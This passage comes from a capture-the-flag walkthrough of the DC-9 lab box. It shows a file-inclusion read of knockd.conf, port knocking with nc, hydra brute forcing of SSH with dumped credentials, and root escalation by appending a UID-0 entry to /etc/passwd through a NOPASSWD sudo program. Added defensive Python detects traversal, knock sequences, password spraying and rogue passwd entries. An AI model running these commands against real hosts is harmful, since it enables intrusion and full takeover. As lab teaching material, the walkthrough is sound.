wilmaf:x:1007:1007:Wilma Flintstone:/home/wilmaf:/bin/bash
bettyr:x:1008:1008:Betty Rubble:/home/bettyr:/bin/bash
chandlerb:x:1009:1009:Chandler Bing:/home/chandlerb:/bin/bash
joeyt:x:1010:1010:Joey Tribbiani:/home/joeyt:/bin/bash
rachelg:x:1011:1011:Rachel Green:/home/rachelg:/bin/bash
rossg:x:1012:1012:Ross Geller:/home/rossg:/bin/bash
monicag:x:1013:1013:Monica Geller:/home/monicag:/bin/bash
phoebeb:x:1014:1014:Phoebe Buffay:/home/phoebeb:/bin/bash
scoots:x:1015:1015:Scooter McScoots:/home/scoots:/bin/bash
janitor:x:1016:1016:Donald Trump:/home/janitor:/bin/bash
janitor2:x:1017:1017:Scott Morrison:/home/janitor2:/bin/bash
```
So this page has a file inclusion vulnerability.
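The page does not show the source of addrecord.php, so the following is an added hardening example rather than the box's own code: a resolver for a `?file=` parameter that refuses anything escaping the include directory, with an optional allowlist. The include directory and its two files are constructed in a temporary folder.

```python
"""Confine a user-supplied include name to one directory.

Added example; the page does not show addrecord.php's source, so this is
a generic hardening pattern written for the ?file= parameter described
above, not the box's own code. The include directory and its contents
are constructed in a temporary folder.
"""
import os
import tempfile

ALLOWED_INCLUDES = {"header.php", "footer.php"}   # constructed allowlist


def resolve_include(base_dir, requested, allowlist=None):
    """Return the real path to include, or None if the request must be refused.

    Refuses empty names, NUL bytes, absolute paths, anything that resolves
    outside base_dir (covers ../ traversal and symlinks), non-files, and,
    when an allowlist is given, any name not on it.
    """
    if not requested or "\x00" in requested or os.path.isabs(requested):
        return None
    if allowlist is not None and requested not in allowlist:
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    if not candidate.startswith(base + os.sep):
        return None
    return candidate if os.path.isfile(candidate) else None


def make_include_dir():
    """Build a constructed include directory holding two harmless files."""
    d = tempfile.mkdtemp(prefix="includes-")
    for name in ALLOWED_INCLUDES:
        with open(os.path.join(d, name), "w") as f:
            f.write("<?php // " + name + "\n")
    return d


def demo():
    """Try a legitimate name and a traversal value; return (accepted, refused)."""
    d = make_include_dir()
    good = resolve_include(d, "header.php")
    bad = resolve_include(d, "../../../../etc/passwd")   # the LFI shape used above
    return (os.path.basename(good) if good else None), bad


if __name__ == "__main__":
    print(demo())   # ('header.php', None)
```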
3.2.3 Port-knocking service
Use the file inclusion found in the previous step to read the port-knocking daemon's configuration file.
URL: http://192.168.6.145/addrecord.php?file=…/…/…/…/etc/knockd.conf
Returned:
```ini
[options]
	UseSyslog

[openSSH]
	sequence    = 7469,8475,9842
	seq_timeout = 25
	command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
	tcpflags    = syn

[closeSSH]
	sequence    = 9842,8475,7469
	seq_timeout = 25
	command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
	tcpflags    = syn
```
The `[openSSH]` section (`sequence = 7469,8475,9842`) says that to open SSH the ports 7469, 8475 and 9842 must be knocked in that order; closing it is the reverse order, 9842, 8475, 7469.
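From the defender's side, the same configuration tells you what a completed knock looks like in the firewall logs. The added example below (not from the box or this writeup) parses the knockd.conf recovered above and replays a constructed, simplified SYN log (`<epoch> SYN <src> -> <dport>`, not real iptables output) to report which source completed the openSSH sequence within seq_timeout, and which attempts timed out or were out of order.

```python
"""Parse knockd.conf and spot completed knock sequences in SYN logs.

Added example, not part of the box or the writeup. KNOCKD_CONF is the
configuration recovered above; SYN_LOG is a constructed, simplified
firewall log ("<epoch> SYN <src> -> <dport>"), not real iptables output.
"""
import re

KNOCKD_CONF = """\
[options]
    UseSyslog

[openSSH]
    sequence    = 7469,8475,9842
    seq_timeout = 25
    command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn

[closeSSH]
    sequence    = 9842,8475,7469
    seq_timeout = 25
    command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn
"""

# Constructed log: one complete knock, one that times out, one out of order.
SYN_LOG = [
    "1000 SYN 192.168.6.66 -> 7469",
    "1001 SYN 192.168.6.66 -> 8475",
    "1002 SYN 192.168.6.66 -> 9842",   # third knock within 2 s: sequence complete
    "1003 SYN 192.168.6.66 -> 22",
    "1100 SYN 192.168.6.77 -> 7469",
    "1101 SYN 192.168.6.77 -> 8475",
    "1140 SYN 192.168.6.77 -> 9842",   # 40 s after the first knock: past seq_timeout
    "1200 SYN 192.168.6.88 -> 7469",
    "1201 SYN 192.168.6.88 -> 9842",   # wrong port: attempt reset
    "1202 SYN 192.168.6.88 -> 8475",
]

LOG_RE = re.compile(r"(\d+) SYN (\S+) -> (\d+)")


def parse_knockd(text):
    """Return {section: {key: value}}; 'sequence' as list of ints, 'seq_timeout' as int."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections[current] = {}
        elif current is not None and "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            if key == "sequence":
                value = [int(p) for p in value.split(",")]
            elif key == "seq_timeout":
                value = int(value)
            sections[current][key] = value
        elif current is not None:
            sections[current][line] = True        # bare flag such as UseSyslog
    return sections


def find_completed_knocks(log_lines, sequence, timeout):
    """Return [(src, epoch)] each time a source hits `sequence` in order within `timeout` s."""
    progress = {}            # src -> (index of next expected port, time of first knock)
    completed = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ts, src, port = int(m.group(1)), m.group(2), int(m.group(3))
        idx, started = progress.get(src, (0, ts))
        if idx and ts - started > timeout:
            idx = 0                                # attempt expired
        if port == sequence[idx]:
            if idx == 0:
                started = ts                       # first knock starts the clock
            idx += 1
        else:
            idx, started = (1, ts) if port == sequence[0] else (0, ts)   # wrong port: reset
        if idx == len(sequence):
            completed.append((src, ts))
            idx = 0
        progress[src] = (idx, started)
    return completed


if __name__ == "__main__":
    conf = parse_knockd(KNOCKD_CONF)
    for name in ("openSSH", "closeSSH"):
        sec = conf[name]
        print(name, find_completed_knocks(SYN_LOG, sec["sequence"], sec["seq_timeout"]))
```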
3.3 SSH
3.3.1 Opening SSH with nc
```bash
┌──(root㉿kali)-[/home/kali]
└─# for i in 7469 8475 9842 22 ;do nc 192.168.6.145 $i;done
(UNKNOWN) [192.168.6.145] 7469 (?) : Connection refused
(UNKNOWN) [192.168.6.145] 8475 (?) : Connection refused
(UNKNOWN) [192.168.6.145] 9842 (?) : Connection refused
(UNKNOWN) [192.168.6.145] 22 (ssh) : Connection refused
```
As the shell output shows.
3.3.2 Port scan
Scan the ports again.
```bash
┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV -oA dc-9 192.168.6.145
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-01 10:28 EDT
Nmap scan report for 192.168.6.145
Host is up (0.00022s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 a2:b3:38:74:32:74:0b:c5:16:dc:13:de:cb:9b:8a:c3 (RSA)
|   256 06:5c:93:87:15:54:68:6b:88:91:55:cf:f8:9a:ce:40 (ECDSA)
|_  256 e4:2c:88:da:88:63:26:8c:93:d5:f7:63:2b:a3:eb:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Example.com - Staff Details - Welcome
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:C1:5E:37 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.55 seconds
```
Port 22 is now open; it is no longer "22/tcp filtered ssh". O(∩_∩)O haha~
3.3.3 hydra
3.3.3.1 Building the wordlists
Build the wordlists from the user information obtained through SQL injection (the UserDetails dump in 3.1.3).
users.txt and passwd.txt
```bash
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# cat users.txt
marym
julied
fredf
barneyr
tomc
jerrym
wilmaf
bettyr
chandlerb
joeyt
rachelg
rossg
monicag
phoebeb
scoots
janitor
janitor2

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# cat passwd.txt
3kfs86sfd
468sfdfsd2
4sfd87sfd1
RocksOff
TC&TheBoyz
B8m#48sd
Pebbles
BamBam01
UrAG0D!
Passw0rd
yN72#dsd
ILoveRachel
3248dsds7s
smellycats
YR3BVxxxw87
Ilovepeepee
Hawaii-Five-0
```
3.3.3.2 执行hydra爆破ssh
利用生成的字典进行ssh爆破
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# hydra -L users.txt -P passwd.txt 192.168.6.145 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-06-01 10:50:43
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 289 login tries (l:17/p:17), ~19 tries per task
[DATA] attacking ssh://192.168.6.145:22/
[22][ssh] host: 192.168.6.145 login: chandlerb password: UrAG0D!
[22][ssh] host: 192.168.6.145 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.6.145 login: janitor password: Ilovepeepee
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-06-01 10:51:39
Obtained some usernames and passwords:
Username | Password |
---|---|
chandlerb | UrAG0D! |
joeyt | Passw0rd |
janitor | Ilovepeepee |
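As an added example (not part of the original walkthrough), the following Python detector shows what the hydra run above looks like from the defender's side: it parses sshd password-authentication log lines and flags any source that tries many different usernames within one time window, reporting which of those logins succeeded. The log lines, PIDs and IP addresses are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd log lines (not captured from the DC-9 box), modelled on what a hydra
# run like the one above leaves behind, plus one benign source that must not be flagged.
SAMPLE_AUTH_LOG = """\
Jun  1 10:50:43 dc-9 sshd[1201]: Failed password for marym from 192.168.6.66 port 50112 ssh2
Jun  1 10:50:43 dc-9 sshd[1202]: Failed password for julied from 192.168.6.66 port 50114 ssh2
Jun  1 10:50:44 dc-9 sshd[1203]: Failed password for invalid user guest from 192.168.6.66 port 50116 ssh2
Jun  1 10:50:44 dc-9 sshd[1204]: Failed password for tomc from 192.168.6.66 port 50118 ssh2
Jun  1 10:50:45 dc-9 sshd[1205]: Accepted password for chandlerb from 192.168.6.66 port 50120 ssh2
Jun  1 10:50:47 dc-9 sshd[1207]: Accepted password for joeyt from 192.168.6.66 port 50124 ssh2
Jun  1 10:51:30 dc-9 sshd[1300]: Failed password for fredf from 192.168.6.20 port 40001 ssh2
Jun  1 10:52:10 dc-9 sshd[1301]: Accepted password for fredf from 192.168.6.20 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (?P<result>Failed|Accepted) "
    r"password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+)"
)

def parse_auth_log(text, year=2024):
    """Return a list of (timestamp, result, user, source_ip) for password-auth lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["result"], m["user"], m["ip"]))
    return events

def find_spraying_sources(events, window_seconds=60, min_distinct_users=5):
    """Flag each source that tried >= min_distinct_users usernames inside one window."""
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev[3]].append(ev)
    flagged = {}
    for ip, evs in by_ip.items():
        evs.sort()  # oldest first, so each start index opens a sliding window
        for i, (start, _, _, _) in enumerate(evs):
            window = [e for e in evs[i:] if (e[0] - start).total_seconds() <= window_seconds]
            users = {e[2] for e in window}
            if len(users) >= min_distinct_users:
                flagged[ip] = {"users": len(users),
                               "failures": sum(e[1] == "Failed" for e in window),
                               "accepted": sorted(e[2] for e in window if e[1] == "Accepted")}
                break  # one report per source is enough
    return flagged
```

A spray that succeeds shows up as a flagged source with a non-empty "accepted" list, which is the event worth alerting on even when the failure count alone looks unremarkable.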
3.4 SSH connections
3.4.1 chandlerb
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# ssh chandlerb@192.168.6.145
chandlerb@192.168.6.145's password:
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
chandlerb@dc-9:~$ ls
chandlerb@dc-9:~$ whoami
chandlerb
chandlerb@dc-9:~$ ls
chandlerb@dc-9:~$ cd /home
chandlerb@dc-9:/home$ ls
barneyr chandlerb janitor jerrym julied monicag rachelg scoots wilmaf
bettyr fredf janitor2 joeyt marym phoebeb rossg tomc
chandlerb@dc-9:/home$ cd chandlerb/
chandlerb@dc-9:~$ ls
chandlerb@dc-9:~$
Nothing useful was found in the chandlerb account.
3.4.2 joeyt
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# ssh joeyt@192.168.6.145
joeyt@192.168.6.145's password:
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
joeyt@dc-9:~$ ls
joeyt@dc-9:~$ cd /home
joeyt@dc-9:/home$ ls
barneyr bettyr chandlerb fredf janitor janitor2 jerrym joeyt julied marym monicag phoebeb rachelg rossg scoots tomc wilmaf
joeyt@dc-9:/home$
Nothing more of use was found in the joeyt account.
3.4.3 janitor
┌──(root㉿kali)-[/home/kali]
└─# ssh janitor@192.168.6.145
janitor@192.168.6.145's password:
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
janitor@dc-9:~$ ls
janitor@dc-9:~$ ls -al
total 16
drwx------ 4 janitor janitor 4096 Jun 2 00:51 .
drwxr-xr-x 19 root root 4096 Dec 29 2019 ..
lrwxrwxrwx 1 janitor janitor 9 Dec 29 2019 .bash_history -> /dev/null
drwx------ 3 janitor janitor 4096 Jun 2 00:51 .gnupg
drwx------ 2 janitor janitor 4096 Dec 29 2019 .secrets-for-putin
janitor@dc-9:~$ cd .secrets-for-putin
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
janitor@dc-9:~/.secrets-for-putin$
janitor@dc-9:~/.secrets-for-putin$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for janitor:
Sorry, user janitor may not run sudo on dc-9.
As shown above, a few more passwords were found; add the newly found passwords to the password wordlist. janitor also has no commands that can be run via sudo.
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# vim passwd.txt
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# cat passwd.txt
3kfs86sfd
468sfdfsd2
4sfd87sfd1
RocksOff
TC&TheBoyz
B8m#48sd
Pebbles
BamBam01
UrAG0D!
Passw0rd
yN72#dsd
ILoveRachel
3248dsds7s
smellycats
YR3BVxxxw87
Ilovepeepee
Hawaii-Five-0
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
Run hydra again with the extended wordlist.
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# hydra -L users.txt -P passwd.txt 192.168.6.145 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-06-01 11:48:21
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 391 login tries (l:17/p:23), ~25 tries per task
[DATA] attacking ssh://192.168.6.145:22/
[22][ssh] host: 192.168.6.145 login: fredf password: B4-Tru3-001
[22][ssh] host: 192.168.6.145 login: chandlerb password: UrAG0D!
[22][ssh] host: 192.168.6.145 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.6.145 login: joeyt password: Passw0rd
[STATUS] 329.00 tries/min, 329 tries in 00:01h, 63 to do in 00:01h, 15 active
[22][ssh] host: 192.168.6.145 login: janitor password: Ilovepeepee
1 of 1 target successfully completed, 5 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-06-01 11:49:34
Obtained a new username and password:
Username | Password |
---|---|
fredf | B4-Tru3-001 |
3.4.4 fredf
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# ssh fredf@192.168.6.145
fredf@192.168.6.145's password:
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
fredf@dc-9:~$ ls
fredf@dc-9:~$ ls -al
total 12
drwx------ 3 fredf fredf 4096 Jun 2 01:48 .
drwxr-xr-x 19 root root 4096 Dec 29 2019 ..
lrwxrwxrwx 1 fredf fredf 9 Dec 29 2019 .bash_history -> /dev/null
drwx------ 3 fredf fredf 4096 Jun 2 01:48 .gnupg
fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test
fredf@dc-9:~$
In the fredf account we found a program that may be run with sudo:
Key line: (root) NOPASSWD: /opt/devstuff/dist/test/test
This means the program can be run as root without entering a password.
Look at test.py:
fredf@dc-9:~$ cd /opt/devstuff
fredf@dc-9:/opt/devstuff$ ls -al
total 28
drwxr-xr-x 5 root root 4096 Dec 29 2019 .
drwxr-xr-x 4 root root 4096 Dec 29 2019 ..
drwxr-xr-x 3 root root 4096 Dec 29 2019 build
drwxr-xr-x 3 root root 4096 Dec 29 2019 dist
drwxr-xr-x 2 root root 4096 Dec 29 2019 __pycache__
-rw-r--r-- 1 root root 250 Dec 29 2019 test.py
-rw-r--r-- 1 root root 959 Dec 29 2019 test.spec
fredf@dc-9:/opt/devstuff$ cat test.py
#!/usr/bin/python

import sys

if len (sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)

else :
    f = open(sys.argv[1], "r")
    output = (f.read())

    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()
fredf@dc-9:/opt/devstuff$
This script reads one file and appends its contents to another. Because the compiled binary runs as root via sudo, it can append a line of our choosing to /etc/passwd: generate a password hash, build a passwd entry for a new user with root privileges (UID 0), append it to /etc/passwd, and then log in as that user to obtain root, completing the privilege escalation.
3.5 Linux privilege escalation
3.5.1 Generate a password hash on Kali
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# openssl passwd -1 -salt admin 123456
$1$admin$LClYcRe.ee8dQwgrFc5nz.
This produces the hashed password:
$1$admin$LClYcRe.ee8dQwgrFc5nz.
3.5.2 Write the password entry into /etc/passwd
Run the following commands in order:
echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwd
cd /opt/devstuff/dist/test/
ls -al
sudo ./test /tmp/passwd /etc/passwd
fredf@dc-9:/opt/devstuff$ echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwd
fredf@dc-9:/opt/devstuff$ cd /opt/devstuff/dist/test/
fredf@dc-9:/opt/devstuff/dist/test$ ls -al
total 12796
drwxr-xr-x 2 root root 4096 Dec 29 2019 .
drwxr-xr-x 3 root root 4096 Dec 29 2019 ..
-rw-r--r-- 1 root root 779676 Dec 29 2019 base_library.zip
-rwxr-xr-x 1 root root 26136 Apr 3 2019 _bz2.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 153904 Apr 3 2019 _codecs_cn.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 158032 Apr 3 2019 _codecs_hk.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 31024 Apr 3 2019 _codecs_iso2022.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 272688 Apr 3 2019 _codecs_jp.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 141616 Apr 3 2019 _codecs_kr.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 112944 Apr 3 2019 _codecs_tw.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 34008 Apr 3 2019 _hashlib.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 74688 Jul 11 2019 libbz2.so.1.0
-rwxr-xr-x 1 root root 3031904 Oct 13 2019 libcrypto.so.1.1
-rwxr-xr-x 1 root root 243840 Sep 20 2019 libexpat.so.1
-rwxr-xr-x 1 root root 158400 Jan 28 2019 liblzma.so.5
-rwxr-xr-x 1 root root 5080176 Apr 3 2019 libpython3.7m.so.1.0
-rwxr-xr-x 1 root root 309096 May 6 2018 libreadline.so.7
-rwxr-xr-x 1 root root 593696 Oct 13 2019 libssl.so.1.1
-rwxr-xr-x 1 root root 183528 Aug 6 2019 libtinfo.so.6
-rwxr-xr-x 1 root root 121280 Sep 26 2017 libz.so.1
-rwxr-xr-x 1 root root 37688 Apr 3 2019 _lzma.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 64792 Apr 3 2019 _multibytecodec.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 14632 Apr 3 2019 _opcode.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 39944 Apr 3 2019 readline.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 19752 Apr 3 2019 resource.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 116568 Apr 3 2019 _ssl.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 29064 Apr 3 2019 termios.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 1212968 Dec 29 2019 test
fredf@dc-9:/opt/devstuff/dist/test$ sudo ./test /tmp/passwd /etc/passwd
fredf@dc-9:/opt/devstuff/dist/test$
The new passwd entry has been appended to /etc/passwd.
3.5.3 Get the flag
3.5.3.1 Switch to the admin user
Username: admin
Password: 123456
fredf@dc-9:/opt/devstuff/dist/test$ su admin
Password:
root@dc-9:/opt/devstuff/dist/test#
The prompt shows that we now have root privileges.
3.5.3.2 Find the flag file
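As an added defensive example (not code from the walkthrough or from the DC-9 box), the following Python script audits /etc/passwd for exactly the kind of entry appended above: a second UID 0 account, and a password hash stored directly in the passwd field rather than in /etc/shadow. The sample passwd content is constructed; the admin line is the one from this walkthrough.

```python
# Constructed /etc/passwd excerpt (not copied from the box): ordinary root, daemon and
# fredf lines, plus the admin line that the walkthrough above appends with sudo ./test.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
fredf:x:1003:1003:Fred Flintstone,,,:/home/fredf:/bin/bash
admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash
"""

def parse_passwd(text):
    """Split passwd lines into dicts; lines without exactly 7 fields are returned separately."""
    entries, malformed = [], []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            malformed.append((n, line))
            continue
        name, pw, uid, gid, _gecos, home, shell = fields
        entries.append({"line": n, "name": name, "pw": pw, "uid": uid,
                        "gid": gid, "home": home, "shell": shell})
    return entries, malformed

def audit_passwd(text):
    """Return (line_no, finding, account) tuples for entries that should never appear.

    'hash-in-passwd' is the one that matters here: when field 2 is not 'x', the hash in
    /etc/passwd is what gets checked at login, so /etc/shadow never had to be touched."""
    entries, malformed = parse_passwd(text)
    findings = [(n, "malformed", line.split(":")[0]) for n, line in malformed]
    seen = set()
    for e in entries:
        if e["uid"] == "0" and e["name"] != "root":
            findings.append((e["line"], "extra-uid0", e["name"]))
        if e["pw"] == "":
            findings.append((e["line"], "empty-password", e["name"]))
        elif e["pw"] != "x" and not e["pw"].startswith(("*", "!")):
            findings.append((e["line"], "hash-in-passwd", e["name"]))
        if e["name"] in seen:
            findings.append((e["line"], "duplicate-name", e["name"]))
        seen.add(e["name"])
    return findings
```

Pairing this check with file-integrity monitoring on /etc/passwd, and reviewing any NOPASSWD sudo rule that lets a user control the destination path of a root-owned write, closes off the path used here.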
root@dc-9:/opt/devstuff/dist/test# find / -name *flag*
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/block/sda/hctx0/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/eth0/flags
/sys/devices/virtual/net/lo/flags
/sys/module/scsi_mod/parameters/default_dev_flags
/var/lib/mysql/debian-10.3.flag
/proc/sys/kernel/acpi_video_flags
/proc/kpageflags
/root/theflag.txt
/usr/lib/x86_64-linux-gnu/perl/5.28.1/bits/ss_flags.ph
/usr/lib/x86_64-linux-gnu/perl/5.28.1/bits/waitflags.ph
/usr/bin/dpkg-buildflags
/usr/include/x86_64-linux-gnu/asm/processor-flags.h
/usr/include/x86_64-linux-gnu/bits/waitflags.h
/usr/include/x86_64-linux-gnu/bits/ss_flags.h
/usr/include/linux/kernel-page-flags.h
/usr/include/linux/tty_flags.h
/usr/share/man/man3/fegetexceptflag.3.gz
/usr/share/man/man3/fesetexceptflag.3.gz
/usr/share/man/nl/man1/dpkg-buildflags.1.gz
/usr/share/man/de/man1/dpkg-buildflags.1.gz
/usr/share/man/man1/dpkg-buildflags.1.gz
/usr/share/man/fr/man1/dpkg-buildflags.1.gz
/usr/share/man/man2/ioctl_iflags.2.gz
/usr/share/dpkg/buildflags.mk
The flag file is located at:
/root/theflag.txt
3.5.3.3 Read the flag file
root@dc-9:/opt/devstuff/dist/test# cat /root/theflag.txt
███╗ ██╗██╗ ██████╗███████╗ ██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗██╗██╗██╗
████╗ ██║██║██╔════╝██╔════╝ ██║ ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║ █████╗ ██║ █╗ ██║██║ ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║ ██╔══╝ ██║███╗██║██║ ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗ ╚███╔███╔╝╚██████╔╝██║ ██║██║ ██╗██╗██╗██╗
╚═╝ ╚═══╝╚═╝ ╚═════╝╚══════╝ ╚══╝╚══╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝╚═╝

Congratulations - you have done well to get to this point.

Hope you enjoyed DC-9. Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.

I also want to send out a big thank you to the various members of @m0tl3ycr3w .

They are an inspirational bunch of fellows.

Sure, they might smell a bit, but...just kidding. :-)

Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.

So long, and thanks for all the fish.

root@dc-9:/opt/devstuff/dist/test#
With that, the DC-9 penetration test is complete and the final flag has been obtained. O(∩_∩)O haha~ The whole article runs to 40,627 characters, phew.
Penetration test summary
The DC-9 penetration test covered nmap scanning, directory scanning (nikto\dirsearch\dirb), SQL injection, wfuzz brute forcing, LFI file inclusion, SSH brute forcing (knockd\nmap\netcat\Hydra) and Linux privilege escalation (openssl) to obtain the flag. The approach was as follows:
- Host discovery and port scanning with nmap
- Directory scanning (nikto\dirsearch\dirb)
- LFI file inclusion vulnerability
- SQL injection with sqlmap to obtain user information
- Password brute forcing with hydra
- SSH brute forcing (knockd\nmap\netcat\Hydra)
- Linux privilege escalation and obtaining the flag